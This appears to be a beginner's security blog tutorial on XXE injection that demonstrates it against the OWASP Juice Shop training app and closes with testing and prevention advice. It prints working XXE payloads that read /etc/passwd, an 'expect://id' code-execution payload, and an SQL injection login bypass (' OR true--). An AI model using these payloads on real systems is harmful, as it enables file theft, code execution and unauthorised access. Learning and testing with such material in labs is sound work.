XML eXternal Entity injection (XXE), which is now part of the OWASP Top 10 via the point A4, is a type of attack against an application that parses XML input. It was a new addition to
the OWASP Top Ten list in the year 2017.
This attack occurs when untrusted XML input containing a reference to an external entity is processed by a weakly configured XML parser.
To understand XXE, it is a prerequisite to know basics of Markup Language and XML.
Markup Language
A System for annotating a document in a way that is distinguishable from the text.
Interpreted by browsers.
HTML, XHTML and XML are few examples.
Used to present information.
XML
eXtensible Markup Language (XML) is a markup language.
It defines a set of rules for encoding documents in a format that is both human-readable and machine-readable.
XML was designed to store and transport data.
Example of XML Code
<?xml version="1.0" encoding="UTF-8"?>
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>What does the code mean?
Note To: Tove From: Jani Heading: Reminder Body: Don't forget me this weekend!
Why Study XML?
XML plays an important role in many different IT systems.
XML is often used for distributing data over the Internet.
It is important (for all types of software developers!) to have a good understanding of XML.
How Can XML be Used?
XML is used in many aspects of web development.
XML is often used to separate data from presentation.
XML Separates Data from Presentation
XML does not carry any information about how to be displayed.
The same XML data can be used in many different presentation scenarios. Because of this, with XML, there is a full separation between data and presentation.
What are XML entities?
XML entities are a way of representing an item of data within an XML document, instead of using the data itself. Various entities are built in to the specification of the XML language. For example, the entities < and > represent the characters < and >. These are meta-characters used to denote XML tags, and so must generally be represented using their entities when they appear within data.
What is XXE Attack?
An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.
Impact of XXE Attacks
Disclosure of confidential data.
Denial of Service,
Server Side Request Forgery,
Port scanning from the perspective of the machine where the parser is located, and other system impacts.
XML external entities are a type of custom entity whose definition is located outside of the DTD where they are declared.
XML DTD
DTD stands for Document Type Definition.
A DTD defines the structure and the legal elements and attributes of an XML document.
The purpose of a DTD is to define the structure and the legal elements and attributes of an XML document.
Note.dtd:
<!DOCTYPE note
[
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>The DTD above is interpreted like this:
!DOCTYPE note - Defines that the root element of the document is note
!ELEMENT note - Defines that the note element must contain the elements: "to, from, heading, body"
!ELEMENT to - Defines the to element to be of type "#PCDATA"
!ELEMENT from - Defines the from element to be of type "#PCDATA"
!ELEMENT heading - Defines the heading element to be of type "#PCDATA"
!ELEMENT body - Defines the body element to be of type "#PCDATA"
The declaration of an external entity uses the SYSTEM keyword and must specify a URL from which the value of the entity should be loaded. For example:
<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://normal-website.com" > ]>The URL can use the file:// protocol, and so external entities can be loaded from file. For example:
<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///path/to/file" > ]>
XML external entities provide the primary means by which XML external entity attacks arise.
Illustration of how the attack works
This image from portswigger.net helps us understand the attack process. I couldn't find a better picture than this on internet to explain XXE. From the picture we can see that the attacker sends a custom XML code and exfiltrates the /etc/passwd file. The sensitive data is exposed using the XXE here.
Types of XXE Attacks
Exploiting XXE to retrieve files, where an external entity is defined containing the contents of a file, and returned in the application's response.
Exploiting XXE to perform SSRF attacks, where an external entity is defined based on a URL to a back-end system.
Exploiting blind XXE exfiltrate data out-of-band, where sensitive data is transmitted from the application server to a system that the attacker controls.
Exploiting blind XXE to retrieve data via error messages, where the attacker can trigger a parsing error message containing sensitive data.
Example 1: Accessing a local resource that may not return
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///dev/random" >]>
<foo>&xxe;</foo>Example 2: Remote Code Execution
If fortune is on our side, and the PHP “expect” module is loaded, we can get RCE.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo
[<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<creds>
<user>`&xxe;`</user>
<pass>`mypass`</pass>
</creds>Example 3: Disclosing /etc/passwd or other targeted files
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>Let's get some hands on. Shall we?
Disclaimer: The demo is for awareness and learning purpose only. I would not be responsible if you indulge in any illegal hacking activities.
I will be using OWASP Juice-shop installed on an Ubuntu virtual box to demonstrate a simple XXE attack.
OWASP Juice-Shop:
OWASP Juice-Shop is probably the most modern and sophisticated insecure web application! It can be used in security trainings, awareness demos, CTFs and as a guinea pig for security tools! Juice Shop encompasses vulnerabilities from the entire OWASP Top Ten along with many other security flaws found in real-world applications!
Note: OWASP Juice-Shop can run on Docker container too but there is no option to exploit few vulnerabilities like XXE while running on Docker. So it is required that we install Juice-Shop on our machine.
How to install OWASP Juice-Shop on Ubuntu?
Install node.js (sudo apt install node.js)
Run git clone https://github.com/bkimminich/juice-shop.git (or clone your own fork of the repository)
Go into the cloned folder with cd juice-shop
Install npm (sudo apt install npm)
Run npm install (only has to be done before first start or when you change the source code)
Run npm start
Browse to http://localhost:3000
We can see that the juice-shop has successfully started. Let's access it using browser.
We would be solving the XXE Data Access challenge
.
For exploiting XXE, it is required that we login to an account to access the complaint section.
Here is the trick to login!
You will have to use SQL injection to login.
Click on Account and then click on login.
In the username filed type ' OR true--
In the password field type anything and click on login.
Now you would have logged in as admin!
To exploit the XXE vulnerability in OWASP Juice-Shop we will be uploading a XML file in the complaint section.
Click on Complaint, a form will appear.
We would be uploading a custom XML file XXE.xml
XXE.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<trades>
<metadata>
<name>Apple Juice</name>
<trader>
<foo>&xxe;</foo>
<name>B. Kimminich</name>
</trader>
<units>1500</units>
<price>106</price>
<name>Lemon Juice</name>
<trader>
<name>B. Kimminich</name>
</trader>
<units>4500</units>
<price>195</price>
</metadata>
</trades>
Click on submit and observe the response from the browser's developer tools.
Here we can see that along with error message, /etc/passwd file contents are also displayed.
Also, we will get a notification that the challenge is solved.
How to find and test for XXE vulnerabilities?
Manually testing for XXE vulnerabilities generally involves:
Testing for file retrieval by defining an external entity based on a well-known operating system file and using that entity in data that is returned in the application's response.
Testing for blind XXE vulnerabilities by defining an external entity based on a URL to a system that you control, and monitoring for interactions with that system. Burp Collaborator client is perfect for this purpose.
Testing for vulnerable inclusion of user-supplied non-XML data within a server-side XML document by using an XInclude attack to try to retrieve a well-known operating system file.
How to prevent XXE vulnerabilities?
Virtually all XXE vulnerabilities arise because the application's XML parsing library supports potentially dangerous XML features that the application does not need or intend to use. The easiest and most effective way to prevent XXE attacks is to disable those features.
Generally, it is sufficient to disable resolution of external entities and disable support for XInclude. This can usually be done via configuration options or by programmatically overriding default behavior. Consult the documentation for your XML parsing library or API for details about how to disable unnecessary capabilities.
For more details on prevention techniques for each of the languages that parse XML, please refer OWASP Cheat Sheet
Additional Resources to explore XXE further:
For more information related to OWASP Juice Shop, refer https://owasp.org/www-project-juice-shop/
For more information related to OWASP Top Ten, refer https://owasp.org/www-project-top-ten/
For additional Labs, refer Port Swigger - Web Security Academy: https://portswigger.net/web-security/xxe
For XML tutorials, refer https://www.w3schools.com/xml/default.asp
To know more about Markup languages, refer https://en.wikipedia.org/wiki/Markup_language
For advanced XXE Injection payloads, refer https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection
Thank you for reading my blog. This is my first blog and I've made an attempt to write on XXE attack. I hope it was informative for you. Please do leave a feedback.
Great article on XXE attack. Very technical yet simple to follow. Many thanks!